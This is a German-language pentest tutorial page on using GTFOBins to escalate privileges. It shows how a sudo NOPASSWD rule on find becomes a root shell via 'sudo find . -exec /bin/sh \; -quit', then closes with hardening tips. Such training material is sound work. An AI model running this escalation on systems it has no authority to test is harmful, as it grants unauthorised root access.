Linux mit GTFOBins

Hintergrund: Was ist GTFOBins?

GTFOBins ("Get The Fuck Out Binaries") ist eine kuratierte Liste legitimer Unix-Binaries, die bei falscher Konfiguration zur Privilege Escalation, File Read/Write, Shell Access oder Exfiltration missbraucht werden können.

Website: https://gtfobins.github.io

Besonders relevant, wenn ein Benutzer über sudo bestimmte Programme ausführen darf – aber ohne vollständige Root-Rechte.

Schritt 1: Berechtigungen prüfen

sudo -l

Beispielausgabe:

User john may run the following commands on base:
    (ALL) NOPASSWD: /usr/bin/find

→ Benutzer john darf find mit Root-Rechten ausführen.

Schritt 2: Passende Binary bei GTFOBins suchen

Suche auf gtfobins.github.io nach "find" und prüfe den Sudo-Abschnitt:

sudo find . -exec /bin/sh \; -quit

Erklärung des Befehls

find .                # sucht im aktuellen Verzeichnis
-exec /bin/sh \;     # führt /bin/sh aus (über -exec)
-quit                 # beendet die Suche nach erstem Match

Wirkung: Da find mit sudo läuft, wird sh ebenfalls als root ausgeführt → Root-Shell

Hinweis: Statt /bin/sh kann /bin/bash verwendet werden, wenn verfügbar:
sudo find . -exec /bin/bash \; -quit

Wann ist das relevant?

Wenn sudo -l Ausgaben wie (ALL) NOPASSWD: /usr/bin/<BINARY> zeigt
Wenn das Binary laut GTFOBins Shell-Ausführung oder Dateizugriff erlaubt
Wenn keine Passwortabfrage erforderlich ist (NOPASSWD:)

Schutzmaßnahmen

sudo nur für genau definierte, sichere Binaries verwenden
NOPASSWD nur in gut kontrollierten Umgebungen einsetzen
Binaries wie find, less, awk, vim etc. vermeiden, wenn nicht unbedingt notwendig

Weitere Quellen:

Previous1. sudo rechte prüfen Next2. SUID-Binaries analysieren

Last updated 8 months ago

hashtagHintergrund: Was ist GTFOBins?

hashtagSchritt 1: Berechtigungen prüfen

hashtagSchritt 2: Passende Binary bei GTFOBins suchen

hashtagErklärung des Befehls

hashtagWann ist das relevant?

hashtagSchutzmaßnahmen